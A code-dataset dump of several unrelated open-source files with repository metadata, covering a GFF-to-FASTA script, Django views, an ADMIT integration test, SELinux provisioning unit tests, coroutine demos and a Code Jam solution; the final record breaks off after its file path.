#!/usr/bin/env python2
__author__ = 'mahajrod'
import argparse
import os
from Bio import SeqIO
from BCBio import GFF
parser = argparse.ArgumentParser()
parser.add_argument("-g", "--in_gff", action="store", dest="in_gff",
help="input gff file")
parser.add_argument("-i", "--in_fasta", action="store", dest="in_fasta",
help="input fasta file")
parser.add_argument("-o", "--out_fasta", action="store", dest="out_fasta",
help="output fasta file")
args = parser.parse_args()
#sequence_dict = SeqIO.index_db("temp_index.idx", [args.in_fasta], format="fasta")
sequence_dict = SeqIO.to_dict(SeqIO.parse(args.in_fasta, format="fasta"))
annotated_dict = {}
with open(args.in_gff, "r") as gff_fd:
for record in GFF.parse(gff_fd, base_dict=sequence_dict):
annotated_dict[record.id] = record
#print(annotated_dict['2R'].features[25])
with open(args.out_fasta, "w") as out_fd:
for record in annotated_dict:
for feature in annotated_dict[record].features:
#print(feature.qualifiers)
feature_location = "%s:%s-%s:%s" % (record, feature.location.start,
feature.location.end, feature.location.strand)
feature_id = ",".join(feature.qualifiers["Parent"]) if "Parent" in feature.qualifiers \
else ",".join(feature.qualifiers["ID"]) if "ID" in feature.qualifiers else "."
feature_name = ",".join(feature.qualifiers["Name"]) if "Name" in feature.qualifiers else "."
feature_seq = feature.extract(annotated_dict[record].seq)
out_fd.write(">%s|%s|%s\n" % (feature_location, feature_id, feature_name))
out_fd.write(str(feature_seq) + "\n")
#os.system("rm temp_index.idx")
|
[
"mahajrod@gmail.com"
] |
mahajrod@gmail.com
|
c9fa9b364091e379c4cc912b154200787e702303
|
776cf3b0f5865c8639692e1256abb5ad493c9f92
|
/__old_stuff/pga/pga_no_sort/maps.py
|
b5503e9085e62d6d3cdc696a8de88c13ab354728
|
[] |
no_license
|
ralphbean/ms-thesis
|
90afb1d5729d83f1910d8dec2e6d4c65d0304bc0
|
3fea08aa069d735fb7048afbab37bb429800fb48
|
refs/heads/master
| 2021-01-19T11:28:14.382925
| 2012-01-25T15:24:54
| 2012-01-25T15:24:54
| 3,265,816
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 666
|
py
|
#!/usr/bin/python
from math import cos, sin, atan2, sqrt
# Some constants:
e = 2.71828183
mu = 5.5
a = 5
b = 25
W = [[ -a, a], [-b, b]]
def sigmoid( x, mu ):
return [( 1 + e**(-mu * ele))**-1 for ele in x]
def logistic( X, mu):
Y = [X[0], X[1]]
Y[0] = Y[0] * ( 1.0 - Y[0]) * mu
Y[1] = Y[1] * ( 1.0 - Y[1]) * mu
return Y
def squeezer( X, a ):
x = X[0]
y = X[1]
u = x
v = y/2.0 + (sqrt(1-x**2))/2.0
r = sqrt(v**2 + u**2)
theta = 2 * atan2(u,v)
u = a * r * cos(theta)
v = r * sin(theta)
Y = [u, v]
return Y
def network( x ):
return sigmoid( [-a * x[0] + a * x[1], -b * x[0] + b * x[1] ], mu )
|
[
"ralph.bean@gmail.com"
] |
ralph.bean@gmail.com
|
7b9565c9c890f3721eb0cfe90417c25a5f7cd443
|
f07b0142e37afe0bf8ed4d56399a0a49f5b1801b
|
/lino_xl/lib/phones/choicelists.py
|
f28f05d7ebd96e388d405b39764b669f8fb987a4
|
[
"BSD-2-Clause"
] |
permissive
|
khchine5/xl
|
af70fb21e4caeb05ff62e9618113c278d71a75ed
|
b1634937a9ce87af1e948eb712b934b11f221d9d
|
refs/heads/master
| 2021-01-20T22:51:01.193260
| 2018-08-22T07:47:43
| 2018-08-22T07:47:43
| 52,145,840
| 1
| 0
|
BSD-2-Clause
| 2018-08-19T12:29:06
| 2016-02-20T09:21:19
|
Python
|
UTF-8
|
Python
| false
| false
| 1,501
|
py
|
# Copyright 2017 Luc Saffre
#
# License: BSD (see file COPYING for details)
from django.core.validators import validate_email, URLValidator
from etgen.html import E
from lino.api import dd, _
from lino.modlib.office.roles import OfficeStaff
validate_url = URLValidator()
class ContactDetailType(dd.Choice):
field_name = None
def format(self, value):
return value
def validate(self, value):
return value
def as_html(self, obj, ar):
return obj.value
STD = ContactDetailType
class EMAIL(ContactDetailType):
def validate(self, value):
validate_email(value)
def as_html(self, obj, ar):
return E.a(obj.value, href="mailto:" + obj.value)
class URL(ContactDetailType):
def validate(self, value):
validate_url(value)
def as_html(self, obj, ar):
txt = obj.remark or obj.value
return E.a(txt, href=obj.value)
class ContactDetailTypes(dd.ChoiceList):
required_roles = dd.login_required(OfficeStaff)
verbose_name = _("Contact detail type")
verbose_name_plural = _("Contact detail types")
item_class = ContactDetailType
add = ContactDetailTypes.add_item_instance
add(EMAIL('010', _("E-Mail"), 'email', field_name="email"))
add(STD('020', _("Mobile"), 'gsm', field_name="gsm"))
add(STD('030', _("Phone"), 'phone', field_name="phone"))
add(URL('040', _("Website"), 'url', field_name="url"))
add(STD('050', _("Fax"), 'fax', field_name="fax"))
add(STD('090', _("Other"), 'other'))
|
[
"luc.saffre@gmail.com"
] |
luc.saffre@gmail.com
|
cdc23af2384a0e3b2df21f4083a35ba0ea45409d
|
f332e3028a5d8fb8a9c09f7f84e249c063e2a561
|
/admit/at/test/integrationtest_moment.py
|
ae28d020b133d1c2c01fe6aed178cb278bb54aee
|
[
"MIT"
] |
permissive
|
astroumd/admit
|
48098dc0490813467317dda4388c6de832ed8772
|
bbf3d79bb6e1a6f7523553ed8ede0d358d106f2c
|
refs/heads/master
| 2023-03-11T17:51:12.944237
| 2020-09-09T16:17:59
| 2020-09-09T16:17:59
| 69,020,469
| 4
| 2
| null | 2018-09-26T21:07:17
| 2016-09-23T11:54:08
|
Python
|
UTF-8
|
Python
| false
| false
| 4,739
|
py
|
#! /usr/bin/env casarun
#
#
# you can either use the "import" method from within casapy
# or use the casarun shortcut to run this from a unix shell
# with the argument being the casa image file to be processed
#
""" Right now you need to run this test inside of casapy
This test does the following:
creates an admit class
creates a moment AT
sets some moment parameters
adds the moment AT to the admit class
runs admit (which in turn runs the needed AT's)
writes the results out to disk
reads them into a new admit instance
prints out one of the BDP xml file names
to run this test do the following:
import admit.at.test.test_moment as tm
tm.run(<filename>) <filename> is the name of the image file to be processed (note for the time being you need to be in the directory containing the image file
"""
import admit
import unittest
import os
class IntegTestMomentAT(unittest.TestCase):
def setUp(self):
self.root = admit.utils.admit_root()
self.inputFile = self.root + "/admit/at/test/mom_integ_test_input.fits"
self.admitdir = self.root + "/admit/at/test/mom_integ_test_input.admit"
self.testoutput = self.root+"/INTEGTESTRESULT"
self.success = "FAILED"
self.cleanup()
def tearDown(self):
self.cleanup()
self.cleanlogs()
f = open(self.testoutput,"a")
f.write(self.success+ " "+self.__class__.__name__ + "\n")
f.close()
def cleanup(self):
try:
cmd = "/bin/rm -rf %s*" % self.admitdir
os.system( cmd )
except Exception as ex :
print "failed to remove admit dir %s :" % self.admit_dir
print ex
# cleanlogs is separate because we don't want to remove logs we might
# be writing to.
def cleanlogs(self):
try:
os.system("/bin/rm -rf ipython*.log")
except:
print "failed to remove ipython logs"
try:
os.system("/bin/rm -rf casapy*.log")
except:
print "failed to remove casapy logs"
# Call the main method runTest() for automatic running.
#
# NB: don't use "run()" - it conflicts unittest.TestCase run()
# method and you get side effects, e.g. fileName =
# <unittest.runner.TextTestResult run=0 errors=0 failures=0>
#
def runTest(self):
try:
# instantiate the Admit class
a = admit.Project(self.admitdir)
# set up to write out figure files
a.plotparams(admit.PlotControl.BATCH,admit.PlotControl.PNG)
fitsin = admit.Ingest_AT(file=self.inputFile)
task0id = a.addtask(fitsin)
# instantiate a moment AT and set some moment parameters
m = admit.Moment_AT()
m.setkey('moments',[0,1,2])
m.setkey('sigma',0.005)
m.setkey('numsigma',[3.0])
task1id = a.addtask(m,[(task0id,0)])
# check the fm
a.fm.verify()
# run admit
a.run()
# save it out to disk.
a.write()
a2 = admit.Project(self.admitdir) # read in the admit.xml and bdp files
self.assertEqual(len(a.fm),len(a2.fm))
for atask in a.fm:
self.assertEqual(len(a.fm[atask]._bdp_out),
len(a2.fm[atask]._bdp_out))
# Note: we don't check bdp_in because they are connected
# "just in time" so will be set None up read-in.
self.assertEqual(a.fm._connmap,a2.fm._connmap)
for at in a.fm:
for i in range(len(a.fm[at]._bdp_out)) :
self.assertEqual( a.fm[at]._bdp_out[i]._taskid,
a2.fm[at]._bdp_out[i]._taskid)
self.assertEqual( a.fm[at]._bdp_out[i].xmlFile,
a2.fm[at]._bdp_out[i].xmlFile)
self.success = "OK"
except Exception, e:
m = "exception=%s, file=%s, lineno=%s" % ( sys.exc_info()[0].__name__, os.path.basename(sys.exc_info()[2].tb_frame.f_code.co_filename), sys.exc_info()[2].tb_lineno)
self.success = "FAILED"
traceback.print_exc()
self.fail("%s failed with: %s" % (self.__class__.__name__ , m))
###############################################################################
# END CLASS #
###############################################################################
suite = unittest.TestLoader().loadTestsFromTestCase(IntegTestMomentAT)
unittest.TextTestRunner(verbosity=0).run(suite)
|
[
"teuben@gmail.com"
] |
teuben@gmail.com
|
760438c3af5adf7bfb936c3a780f4284e5c4c8c5
|
bd87d8947878ccb2f5b720e70a22493b00868fd3
|
/justpy/02_basics/hello.py
|
2888edfd040f2b33e125af2a67c8b73a03f4132e
|
[] |
no_license
|
damiansp/completePython
|
4cbf12ef682a1d4a5498f77e407dc02e44a7d7ac
|
3f5e2f14d79c93df5147b82d901190c054535158
|
refs/heads/master
| 2023-09-01T20:50:03.444440
| 2023-08-28T00:27:57
| 2023-08-28T00:27:57
| 99,197,610
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
import justpy as jp
def hello():
wp = jp.WebPage()
p = jp.P(text='Hello, World!', a=wp)
return wp
jp.justpy(hello)
|
[
"damiansp@gmail.com"
] |
damiansp@gmail.com
|
67369667933e56134fd39641a2ff54257295372e
|
f92dfdebb4bf6bc108f51783333520c35afa66da
|
/admin-web/src/www/application/modules/exon/actions.py
|
0f983721c26d50584b6b180491a8a68d2dd6eca0
|
[] |
no_license
|
duytran92-cse/nas-genodata
|
4d8659a135913d226842ff6a013324714ead0458
|
80c88f42145f729c5862a5293012e71548182e1d
|
refs/heads/master
| 2022-11-13T17:24:03.769605
| 2020-06-14T18:59:36
| 2020-06-14T18:59:36
| 272,264,593
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,962
|
py
|
from django.http import HttpResponse, HttpResponseRedirect
from django.conf import settings
from notasquare.urad_web import actions, page_contexts, widgets
from notasquare.urad_web_material import renderers
from application import constants
from . import components
import json
class List(actions.crud.ListAction):
def create_page_context(self):
return components.FullPageContext(self.params, self.container)
class TableRenderer(renderers.widgets.table.DataTableRenderer):
def render_cell_actions(self, table, row):
html = '<div class="btn-group btn-group">'
html += ' <a class="btn btn-xs btn-primary" href="/exon/update/%s">Edit</a>' % (row['id'])
html += ' <a class="btn btn-xs btn-danger" href="/exon/delete/%s" onclick="return confirm(\'Are you really want to delete this?\')">Delete</a>' % (row['id'])
html += '</div>'
return html
def create_table(self):
table = widgets.table.DataTable()
table.set_title('Exon')
table.set_subtitle('List of exon')
# table.create_button('create', '/exon/create', 'zmdi-plus')
table.create_column('id', 'ID', '10%', sortable=True)
table.create_column('code', 'Code', '60%')
table.create_column('actions', '', '14%')
table.add_field(widgets.field.Textbox('text'))
table.add_field(widgets.field.Combobox('is_good_quality', choices=constants.FILTER))
table.renderer = self.TableRenderer()
table.renderer.table_form_renderer = renderers.widgets.form.TableFormRenderer()
table.renderer.table_form_renderer.add_field('text', 'Search', colspan=8)
table.renderer.table_form_renderer.add_field('is_good_quality', 'Quality', colspan=4)
table.renderer.table_form_renderer.set_field_renderer('textbox', renderers.widgets.field.TextboxRenderer())
table.renderer.table_form_renderer.set_field_renderer('combobox', renderers.widgets.field.ComboboxRenderer())
return table
def load_table_data(self, table_form_data, sortkey, sortdir, page_number):
return components.PageStore(self.get_container()).list(table_form_data, sortkey, sortdir, page_number)
class Update(actions.crud.FormAction):
def create_page_context(self):
return components.FullPageContext(self.params, self.container)
class PageUpdateRenderer(renderers.page_update.PageUpdateRenderer):
pass
def create_table(self):
table = widgets.table.DataTable()
table.renderer = self.PageUpdateRenderer()
return table
def load_table_data(self):
return components.PageStore(self.get_container()).get(self.params['code'])
def GET(self):
page_context = self.create_page_context()
table_widget = self.create_table()
data = self.load_table_data()
data['page_id'] = 'exon'
table_widget.set_data(data)
page_context.add_widget(table_widget)
return HttpResponse(page_context.render())
class History(actions.crud.FormAction):
class HistoryRenderer(renderers.page_update.HistoryRenderer):
pass
def create_table(self):
table = widgets.table.DataTable()
table.renderer = self.HistoryRenderer()
return table
def load_table_data(self):
return components.PageStore(self.get_container()).history(self.params['code'], self.params['field'])
def GET(self):
page_context = renderers.page_update.HistoryRenderer()
table_widget = self.create_table()
record = self.load_table_data()
data = {}
data['data'] = record
data['text'] = {'field': self.params['field'], 'code': self.params['code']}
return HttpResponse(page_context.render(data))
class Delete(actions.crud.DeleteAction):
def GET(self):
result = components.PageStore(self.get_container()).delete(self.params['id'])
return HttpResponseRedirect('/exon/list')
|
[
"thanh.tran@etudiant.univ-lr.fr"
] |
thanh.tran@etudiant.univ-lr.fr
|
cd2b3e03c7d4829e4d97f8148c5adb257164f06b
|
9c124f6accd89a3ccf08b4c1205159d78c731f85
|
/5/main2.py
|
90c084d9fdd727393875c7852c0b3e4be61179b0
|
[] |
no_license
|
irongamer54/Sumer_2021
|
5600272dc11bddf6276bb56d0db4cff66ff6b20d
|
d61348274772cf95f0b06f904bfbb0ec61ebd1b1
|
refs/heads/master
| 2023-06-26T12:26:41.623768
| 2021-07-23T03:46:18
| 2021-07-23T03:46:18
| 383,372,964
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 196
|
py
|
from tkinter import *
root=Tk()
canvas=Canvas(root,width=500,height=500)
canvas.pack()
pers_obj = PhotoImage(file="pers.png")
canvas.create_image(50,50,anchor= NW, image=pers_obj)
root.mainloop()
|
[
"you@example.com"
] |
you@example.com
|
8dfcde4d529883da7fcaa024d87d1e941b74687a
|
6caab8d886e8bd302d1994ff663cf5ccb5e11522
|
/MyNotes_01/Step01/3-OO/day02_10/demo02.py
|
af2d3e088e530fe9803b841cfed86c5256b3275a
|
[] |
no_license
|
ZimingGuo/MyNotes01
|
7698941223c79ee754b17296b9984b731858b238
|
55e6681da1a9faf9c0ec618ed60f5da9ecc6beb6
|
refs/heads/master
| 2022-07-30T21:30:32.100042
| 2020-05-19T16:59:09
| 2020-05-19T16:59:09
| 265,254,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 935
|
py
|
# author: Ziming Guo
# time: 2020/2/15
"""
demo02:
类成员
练习:exercise03.py
"""
class ICBC:
"""
demo02:
工商银行
"""
# 表示总行的钱
total_money = 1000000 # 这不是对象的数据,这是类的数据
# 因为类方法没有对象地址self,所以不能访问实例成员
@classmethod
def print_total_money(cls):
# print(id(cls),id(ICBC))
print("总行还剩%d钱" % ICBC.total_money)
def __init__(self, name, money): # 这些才是对象的数据
self.name = name
self.money = money
# 表示从总行中扣除当前支行使用的金额
ICBC.total_money -= money
i01 = ICBC("广渠门支行", 100000)
ICBC.print_total_money()
i02 = ICBC("陶然亭支行", 100000)
# print("总行还剩%d钱" % ICBC.total_money)
# 通过类名访问类方法,会将类名传入类方法.
ICBC.print_total_money()
|
[
"guoziming99999@icloud.com"
] |
guoziming99999@icloud.com
|
cd15735e33041560a98ded732972d3b02180e502
|
d6815f4c7774d30c5d12d2205703427693294dec
|
/tests/unit/more/debian/security/test_selinux.py
|
af2403dca31f2fdbb42f262bc50c9f76b86bba2a
|
[
"MIT"
] |
permissive
|
python-provy/provy
|
2579bbedc31f559992b7c007a4a2e75424d3507f
|
ca3d5e96a2210daf3c1fd4b96e047efff152db14
|
refs/heads/master
| 2021-12-30T12:03:28.083794
| 2019-02-20T16:55:32
| 2019-02-20T16:55:32
| 1,948,340
| 16
| 3
|
MIT
| 2021-12-26T06:30:37
| 2011-06-24T16:01:45
|
Python
|
UTF-8
|
Python
| false
| false
| 4,010
|
py
|
from mock import call, patch
from nose.tools import istest
from provy.more.debian import AptitudeRole, SELinuxRole
from tests.unit.tools.helpers import ProvyTestCase
class SELinuxRoleTest(ProvyTestCase):
def setUp(self):
super(SELinuxRoleTest, self).setUp()
self.role = SELinuxRole(prov=None, context={'cleanup': []})
@istest
def provisions_correctly(self):
with self.mock_role_methods('install_packages', 'activate'):
self.role.provision()
self.role.install_packages.assert_called_with()
self.role.activate.assert_called_with()
@istest
def installs_packages_in_debian(self):
with self.using_stub(AptitudeRole) as aptitude, self.provisioning_to('debian'):
self.role.install_packages()
expected_packages = [
call('selinux-basics'),
call('selinux-policy-default'),
call('selinux-utils'),
call('auditd'),
call('audispd-plugins'),
]
self.assertEqual(aptitude.ensure_package_installed.mock_calls, expected_packages)
@istest
def installs_packages_in_ubuntu(self):
with self.using_stub(AptitudeRole) as aptitude, self.provisioning_to('ubuntu'):
self.role.install_packages()
expected_packages = [
call('selinux'),
call('selinux-utils'),
call('auditd'),
call('audispd-plugins'),
]
self.assertEqual(aptitude.ensure_package_installed.mock_calls, expected_packages)
@istest
def activates_on_debian(self):
with self.execute_mock() as execute, self.provisioning_to('debian'), patch.object(self.role, 'enforce'):
self.role.activate()
expected_calls = [
call('selinux-activate', stdout=False, sudo=True),
call("semanage login -m -s 'user_u' -r s0 __default__", stdout=False, sudo=True),
]
self.assertEqual(execute.mock_calls, expected_calls)
self.role.enforce.assert_called_with()
@istest
def activates_on_ubuntu(self):
with self.execute_mock() as execute, self.provisioning_to('ubuntu'), patch.object(self.role, 'enforce'):
self.role.activate()
expected_calls = [
call("semanage login -m -s 'user_u' -r s0 __default__", stdout=False, sudo=True),
]
self.assertEqual(execute.mock_calls, expected_calls)
self.role.enforce.assert_called_with()
@istest
def puts_environment_in_enforce_mode(self):
with self.execute_mock(), self.mock_role_method('ensure_line'), self.warn_only():
self.role.enforce()
self.role.execute.assert_called_with('setenforce 1', stdout=False, sudo=True)
self.role.ensure_line.assert_called_with('SELINUX=enforcing', '/etc/selinux/config', sudo=True)
@istest
def ensures_that_a_login_mapping_exists(self):
with self.execute_mock() as execute, self.warn_only():
self.role.ensure_login_mapping('foo')
execute.assert_called_with('semanage login -a foo', stdout=False, sudo=True)
@istest
def maps_a_login_user_to_an_selinux_user(self):
with self.execute_mock() as execute, patch.object(self.role, 'ensure_login_mapping'):
self.role.map_login('foo', 'staff_u')
self.role.ensure_login_mapping.assert_called_with('foo')
execute.assert_called_with('semanage login -m -s staff_u foo', stdout=False, sudo=True)
@istest
def maps_a_login_user_to_selinux_roles(self):
with self.execute_mock() as execute, patch.object(self.role, 'ensure_login_mapping'):
self.role.map_role('foo', ['staff_r', 'sysadm_r'])
self.role.ensure_login_mapping.assert_called_with('foo')
execute.assert_called_with("semanage user -m -R 'staff_r sysadm_r' foo", stdout=False, sudo=True)
|
[
"diogobaeder@yahoo.com.br"
] |
diogobaeder@yahoo.com.br
|
9b6a7efd933b95b6d869bcec2a89469658c6997c
|
22f480f1ec13e59f1bcf4a244973db64f875e0db
|
/coroutine_test.py
|
42b3accced3c46d5ec3c57341d831fd9e94cd443
|
[] |
no_license
|
xiphodon/spider_hs_code
|
de3a4a555be2ed9dac295ef93a921c3697a6bc6a
|
c447c94c367c029fc13af458c668eb1f87a7b67c
|
refs/heads/master
| 2021-12-27T23:11:07.925493
| 2021-12-16T16:41:34
| 2021-12-16T16:41:34
| 105,999,246
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,598
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/5/10 9:45
# @Author : GuoChang
# @Site : https://github.com/xiphodon
# @File : coroutine_test.py
# @Software: PyCharm
"""协程测试"""
def consumer():
print('==== c_A ====')
r = ''
while True:
print('==== c_B ====')
n = yield r
print('==== c_C ====')
if not n:
return
print('[CONSUMER] Consuming %s...' % n)
r = '200 OK'
print('==== c_D ====')
def produce(c):
print('==== p_A ====')
r = c.send(None)
print('[PRODUCER] c.send(None) %s...' % r)
n = 0
print('==== p_B ====')
while n < 5:
n = n + 1
print('[PRODUCER] Producing %s...' % n)
print('==== p_C ====')
r = c.send(n)
print('==== p_D ====')
print('[PRODUCER] Consumer return: %s' % r)
c.close()
print('==== p_E ====')
def start_1():
c = consumer()
produce(c)
def generator_1():
total = 0
while True:
x = yield
print('加', x)
if not x:
return total
total += x
def generator_2(): # 委托生成器
while True:
print('while True')
total = yield from generator_1() # 子生成器
print('加和总数是:', total)
def start_2(): # 调用方
g1 = generator_1()
g1.send(None)
g1.send(2)
g1.send(3)
g1.send(None)
def start_3():
g2 = generator_2()
g2.send(None)
g2.send(2)
g2.send(3)
g2.send(None)
if __name__ == '__main__':
# start_1()
# start_2()
start_3()
|
[
"827789895@qq.com"
] |
827789895@qq.com
|
c6fd884951bb2eeb1d9b7ce2023f5052fe299ee0
|
a1504798a55d652c9c0705cc507fe2cb9678ea4f
|
/Adavnce_CRUD/MySQL_Index/main.py
|
d3dc0fb9d8d0d67cb6cb139875050e8b004effdf
|
[] |
no_license
|
ritikapatel1410/Python_MySql
|
a4a952abd7b0394eafc071de0f55efd6a7a3b359
|
d90da25391243d5c08156a9184727c3e42e43517
|
refs/heads/main
| 2023-03-21T01:24:02.465879
| 2021-03-18T07:55:04
| 2021-03-18T07:55:04
| 347,563,406
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,533
|
py
|
"""
@Author: Ritika Patidar
@Date: 2021-03-15 00:10:10
@Last Modified by: Ritika Patidar
@Last Modified time: 2021-03-15 00:10:38
@Title : main code of perform index operation
"""
import sys
import os
sys.path.insert(0,os.path.relpath("LogFile"))
import loggerfile
from Mysql_Index import Index_Operation
def main():
"""
Description:
this function is define for mode of different operation of index
Parameter:
None
Return:
None
"""
try:
Obj_Index_Operation=Index_Operation()
mode=int(input("================================= Select Mode For index =====================================\n0 : Create Index\n====================================\n1 : Explain Index\n==============================================\n2 : Show Index\n==================================================================\n3 : Drop Index\n=============================================\n4 : quit\n=================================================================\nenter : "))
if(mode==0):
print(Obj_Index_Operation.Create_Index())
elif(mode==1):
print(Obj_Index_Operation.Explain_Index())
elif(mode==2):
Obj_Index_Operation.Show_Index()
elif(mode==3):
print(Obj_Index_Operation.Drop_Index())
elif(mode==4):
sys.exit()
loggerfile.Logger("info","succesfully select the mode")
except Exception as error:
loggerfile.Logger("error","{0} error occured".format(error))
main()
|
[
"patelrit1410@gmail.com"
] |
patelrit1410@gmail.com
|
f70e05449d250838b42f4c3df78e59421ddc3543
|
a2f9d55d686425c4b47ce150aa1a23ea933055cc
|
/apps/tinymce/views.py
|
12c563915b667935e080b56611e1df8b35b9ad48
|
[] |
no_license
|
wd5/blombum
|
b31c581f2c36c220164901189be1ba95a8341e0e
|
fe11efb369fe2cec67af1e79bc8935a266df2f80
|
refs/heads/master
| 2020-12-25T02:23:30.297939
| 2010-06-29T10:03:31
| 2010-06-29T10:03:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
import re
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.http import Http404, HttpResponseRedirect
from settingsDB.utils import SettingsCached
def read_path(request, path):
if re.search('(jpg|png|jpeg|gif)$', path):
return HttpResponseRedirect(SettingsCached.param.STATIC_URL+'js/tinymce/'+path)
return render_to_response('tinymce/'+path, RequestContext(request))
|
[
"nide@inbox.ru"
] |
nide@inbox.ru
|
32a23f9df83cc51dbe7edb439bd22dbc167ade77
|
13d222bc3332378d433835914da26ed16b583c8b
|
/src/pemjh/challenge116/main.py
|
83123ed7d1f367503d574aa5a8a7a8a0a060e775
|
[] |
no_license
|
mattjhussey/pemjh
|
c27a09bab09cd2ade31dc23fffac07374bea9366
|
2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99
|
refs/heads/master
| 2023-04-16T03:08:59.390698
| 2023-04-08T10:54:00
| 2023-04-08T10:54:00
| 204,912,926
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 916
|
py
|
""" Challenge116 """
# pylint: disable=missing-docstring
from pemjh.function_tools import memoize
@memoize()
def num_variations(blocks, tile_size, dec=True):
num = 0
if blocks > 1:
# work out with tile here
if blocks >= tile_size:
num += num_variations(blocks - tile_size,
tile_size,
False)
# work out with tile not here
num += num_variations(blocks - 1, tile_size, False)
else:
num = 1
if dec:
num -= 1
return num
def process(blocks):
num_2_variations = num_variations(blocks, 2)
num_3_variations = num_variations(blocks, 3)
num_4_variations = num_variations(blocks, 4)
return num_2_variations + num_3_variations + num_4_variations
def main(blocks):
""" challenge116 """
return process(blocks)
|
[
"matthew.hussey@googlemail.com"
] |
matthew.hussey@googlemail.com
|
02eaf3db773ab02db6f4b89bf7367f023bcb00d3
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_aggregated.py
|
fad5b0d4f6fa9ecaef3cf929a8aed423b13aacbd
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 269
|
py
|
from xai.brain.wordbase.adjectives._aggregate import _AGGREGATE
#calss header
class _AGGREGATED(_AGGREGATE, ):
def __init__(self,):
_AGGREGATE.__init__(self)
self.name = "AGGREGATED"
self.specie = 'adjectives'
self.basic = "aggregate"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
bd0ddc98cc185bd0c345391c4fd04ccb8f855b0f
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/rnvBtoNMBtznXLhs8_24.py
|
3666f1e694da00a3301b67e01f1e0199407af097
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
def win_round(you, opp):
res = []
for item in [you, opp]:
first = max(item)
item.remove(first)
second = max(item)
res.append(int(str(first) + str(second)))
you_score, opp_score = res
if you_score > opp_score:
return True
return False
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
297a221039f6223d99486f0a5574016946b8bb72
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5670465267826688_1/Python/Saaber/saber_dijkstra.py
|
07db2c9ea613fb670076171aa5363a1bcd777e85
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,509
|
py
|
d = {'11':'1', '1i':'i', '1j':'j', '1k':'k', \
'i1':'i', 'ii':'-1' , 'ij':'k', 'ik':'-j', \
'j1':'j', 'ji':'-k' , 'jj':'-1', 'jk':'i', \
'k1':'k', 'ki':'j' , 'kj':'-i', 'kk':'-1' }
def evaluate(s1, s2):
neg1, neg2 = s1.count('-') , s2.count('-')
t1, t2 = s1.replace('-',''), s2.replace('-','')
neg = neg1 + neg2
key = t1 + t2
res = d[key]
if (neg % 2) == 1:
if res[0] == '-':
res = res[1:]
else:
res = '-' + res
return res
def evaluate_substring(substr, result, flag_i, flag_ij):
if result == 'i':
flag_i = True
for i in xrange( len(substr)):
result = evaluate(result, substr[i])
if result == 'i' and flag_i == False:
flag_i = True
if result == 'k' and flag_i == True:
flag_ij = True
return result, flag_i, flag_ij
def power(a, b):
result = 1
ijop = 1
if b == 1 or a == '1':
return a
if a not in ['-1' , '1']:
result = evaluate(a, a)
result = pow(int(result) , int(b/2))
if (b %2 ) == 1:
result = evaluate(str(result), a)
else:
if (b % 2) == 0:
result = 1
else:
result = -1
ijop = -1
return str(result)
def evaluate_string(x, repeat):
res, flag_i, flag_ij = '1', False, False
f_r = 1
#first resylt null
res_x = ''
for i in xrange(repeat):
res, flag_i, flag_ij = evaluate_substring(x, res, flag_i, flag_ij)
if i == 0:
res_x = res
p = power(res, repeat)
#print ' p = ' + str(p)
if p != '-1':
return False
# for sure if it didn't find i and j, then it can't find it anymore
if i > 100000:
return False
if flag_i == True and flag_ij == True:
return True
if res == '-1' and flag_ij == True:
return True
return False
def main():
f_name = 'C-large.in.txt'
fh = open(f_name, 'rt')
line = fh.readline()
test_cases = int(line)
result = ''
for i in xrange(1, test_cases+ 1):
line1 = fh.readline().replace('\n','')
line2 = fh.readline().replace('\n','')
repeat = int(line1.split(' ')[1])
string = ''
if len(line2) * repeat < 4:
string = str(line2) * repeat
if len(string) < 3:
result += 'Case #' + str(i) + ": NO\n"
continue
elif len(string) == 3:
if string == 'ijk':
result += 'Case #' + str(i ) + ": YES\n"
continue
else:
result += 'Case #' + str(i ) + ": NO\n"
continue
eval_str = evaluate_string(line2, repeat)
if eval_str == True:
result += 'Case #' + str( i ) + ": YES\n"
else:
result += 'Case #' + str(i ) + ": NO\n"
print result
fh.close()
f = open('saber_dijkstra.out', 'w')
f.write(result)
f.close()
main()
|
[
"eewestman@gmail.com"
] |
eewestman@gmail.com
|
03ee163b9ac703119f8282805997115dac007738
|
b6e5a79533b23404bf1582e9c66f4d1a9500b992
|
/backend/usa_2_go_27981/wsgi.py
|
